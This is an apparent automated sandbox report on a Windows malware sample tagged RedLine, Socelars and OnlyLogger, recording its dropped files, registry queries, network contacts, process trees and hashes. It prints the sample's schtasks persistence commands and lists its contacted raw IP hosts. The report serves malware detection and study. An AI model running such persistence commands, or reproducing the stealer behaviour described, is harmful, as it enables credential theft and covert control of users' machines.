Malware Analysis Report

2025-01-02 06:52

Sample ID 220404-d9qcbsacg4
Target Service.bmpgplkoxjs
SHA256 611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f
Tags
evasion spyware stealer trojan onlylogger redline socelars 123 bootkit infostealer loader persistence vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

611479c78035c912dd69e3cfdadbf74649bb1fce6241b7573cfb0c7a2fc2fb2f

Threat Level: Known bad

The file Service.bmpgplkoxjs was found to be: Known bad.

Malicious Activity Summary

evasion spyware stealer trojan onlylogger redline socelars 123 bootkit infostealer loader persistence vmprotect

OnlyLogger

RedLine

RedLine Payload

Modifies Windows Defender Real-time Protection settings

Process spawned unexpected child process

Socelars Payload

Socelars

Identifies VirtualBox via ACPI registry values (likely anti-VM)

OnlyLogger Payload

VMProtect packed file

Executes dropped EXE

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Checks BIOS information in registry

Reads user/profile data of web browsers

Looks up external IP address via web service

Writes to the Master Boot Record (MBR)

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

NSIS installer

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Script User-Agent

Kills process with taskkill

Delays execution with timeout.exe

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-04-04 03:42

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-04-04 03:42

Reported

2022-04-04 06:12

Platform

win7-20220311-en

Max time kernel

4294211s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Service.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\AppData\Local\Temp\Service.exe N/A
File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\AppData\Local\Temp\Service.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = [certificate blob omitted] C:\Users\Admin\AppData\Local\Temp\Service.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118 C:\Users\Admin\AppData\Local\Temp\Service.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1220 wrote to memory of 1248 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe
PID 1220 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1220 wrote to memory of 392 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1248 wrote to memory of 1548 N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe
PID 1248 wrote to memory of 700 N/A C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Service.exe

"C:\Users\Admin\AppData\Local\Temp\Service.exe"

C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

"C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe

"C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 364

Network

Country Destination Domain Proto
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.65:443 twitter.com tcp
US 104.244.42.65:443 twitter.com tcp
US 8.8.8.8:53 yandex.ru udp
RU 5.255.255.70:443 yandex.ru tcp
US 8.8.8.8:53 repository.certum.pl udp
NL 104.110.191.14:80 repository.certum.pl tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 212.193.30.21:80 212.193.30.21 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 45.144.225.57:80 45.144.225.57 tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 45.144.225.57:80 45.144.225.57 tcp
NL 212.193.30.21:80 212.193.30.21 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:80 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 45.144.225.57:80 45.144.225.57 tcp
NL 212.193.30.21:80 212.193.30.21 tcp

Files

memory/1220-54-0x0000000075DF1000-0x0000000075DF3000-memory.dmp

\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

memory/1248-56-0x0000000000000000-mapping.dmp

C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

memory/1520-59-0x0000000000000000-mapping.dmp

memory/392-60-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 81180798f4d48d852ec031c3eed10781
SHA1 b66bbc8d7a8e5e0c65b0d9c624f2c13e6bfe8c61
SHA256 f901a508db08da3d9cc47b3eade0ddc2bbb273b92cccecfe26df7a6df9f9e4bc
SHA512 4de8e91721ce37693c410a38ee5fb73ca260b8006904916fbb1892114918b2ced1bfb1d5a4195e666d94ae1fdfbef4932c128b5c2e8e76036869ea11a1a31c58

C:\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

memory/1248-63-0x0000000003F10000-0x00000000040CF000-memory.dmp

\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe

MD5 3f22bd82ee1b38f439e6354c60126d6d
SHA1 63b57d818f86ea64ebc8566faeb0c977839defde
SHA256 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512 b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f

memory/1548-65-0x0000000000000000-mapping.dmp

C:\Users\Admin\Pictures\Adobe Films\xhHdjGYIwFulfOaZIwhO9BKf.exe

MD5 3f22bd82ee1b38f439e6354c60126d6d
SHA1 63b57d818f86ea64ebc8566faeb0c977839defde
SHA256 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
SHA512 b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f

memory/700-67-0x0000000000000000-mapping.dmp

\Users\Admin\Documents\jm235Pg5NufPS8T2Br5Niylp.exe

MD5 5546c1ab6768292b78c746d9ea627f4a
SHA1 be3bf3f21b6101099bcfd7203a179829aea4b435
SHA256 93708ec7bc1f9f7581cc2e1310a46000ad38128e19eb1e92db88e59d425b3e15
SHA512 90d341f42f80c99558b9659e6cc39f7211acaf4010234c51f7cc66d729102f25b50bf29688ee29b8a4031b4f35d4666617a278ba1754c96c26aa6759027f601f

Analysis: behavioral2

Detonation Overview

Submitted

2022-04-04 03:42

Reported

2022-04-04 06:15

Platform

win10v2004-20220310-en

Max time kernel

58s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Service.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan

OnlyLogger

loader onlylogger

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

OnlyLogger Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\siww1049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\note6060.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\inst200.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Public\SteamKeyGen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udontsay.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-8865F.tmp\setup.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Service.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A checkip.amazonaws.com N/A N/A
N/A checkip.amazonaws.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\AppData\Local\Temp\Service.exe N/A
File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe C:\Users\Admin\AppData\Local\Temp\Service.exe N/A

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [certificate blob omitted] C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe N/A
N/A N/A C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Roaming\Routes\Routes.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3468 wrote to memory of 1228 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe
PID 3468 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 3468 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\Service.exe C:\Windows\SysWOW64\schtasks.exe
PID 1228 wrote to memory of 3300 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe
PID 1228 wrote to memory of 2960 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe
PID 1228 wrote to memory of 2032 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe
PID 1228 wrote to memory of 3600 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe
PID 1228 wrote to memory of 3984 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
PID 3984 wrote to memory of 4192 N/A C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe
PID 1228 wrote to memory of 4248 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe
PID 3600 wrote to memory of 4344 N/A C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe
PID 4248 wrote to memory of 4336 N/A C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp
PID 1228 wrote to memory of 4508 N/A C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe C:\Windows\SysWOW64\cmd.exe
PID 4336 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe
PID 4532 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\is-IQ2D1.tmp\5(6665____.exe C:\Windows\system32\fondue.exe
PID 4344 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zSFBC2.tmp\Install.exe
PID 4880 wrote to memory of 4900 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4508 wrote to memory of 4924 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr98262.exe
PID 4508 wrote to memory of 5004 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe
PID 4508 wrote to memory of 5112 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\siww1049.exe
PID 4508 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\note6060.exe
PID 4508 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\1.exe
PID 5004 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe C:\Users\Admin\AppData\Local\Temp\wangjinfeng.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Service.exe

"C:\Users\Admin\AppData\Local\Temp\Service.exe"

C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe

"C:\Users\Admin\Documents\20wnKrDLU7onLKrA82A1ZxPh.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe

"C:\Users\Admin\Pictures\Adobe Films\6KJq6bLO2v529EYConm_g1TP.exe"

C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe

"C:\Users\Admin\Pictures\Adobe Films\8AyDk7NAPV0v24oDY1Q7VVXZ.exe"

C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe

"C:\Users\Admin\Pictures\Adobe Films\dOaBjSg8mYjqYth2dayxRNWl.exe"

C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe

"C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe"

C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe

"C:\Users\Admin\Pictures\Adobe Films\cZSRSHgTd8DlJEacM46ocVuM.exe"

C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe

"C:\Users\Admin\Pictures\Adobe Films\_0V_WP7Xb63o5XHjSZ4R5sNV.exe" -h

C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe

"C:\Users\Admin\Pictures\Adobe Films\SUsOP56v2IWwb71Bz51Cg1sx.exe"

C:\Users\Admin\AppData\Local\Temp\7zSF25C.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\is-N4MTP.tmp\SUsOP56v2IWwb71Bz51Cg1sx.tmp

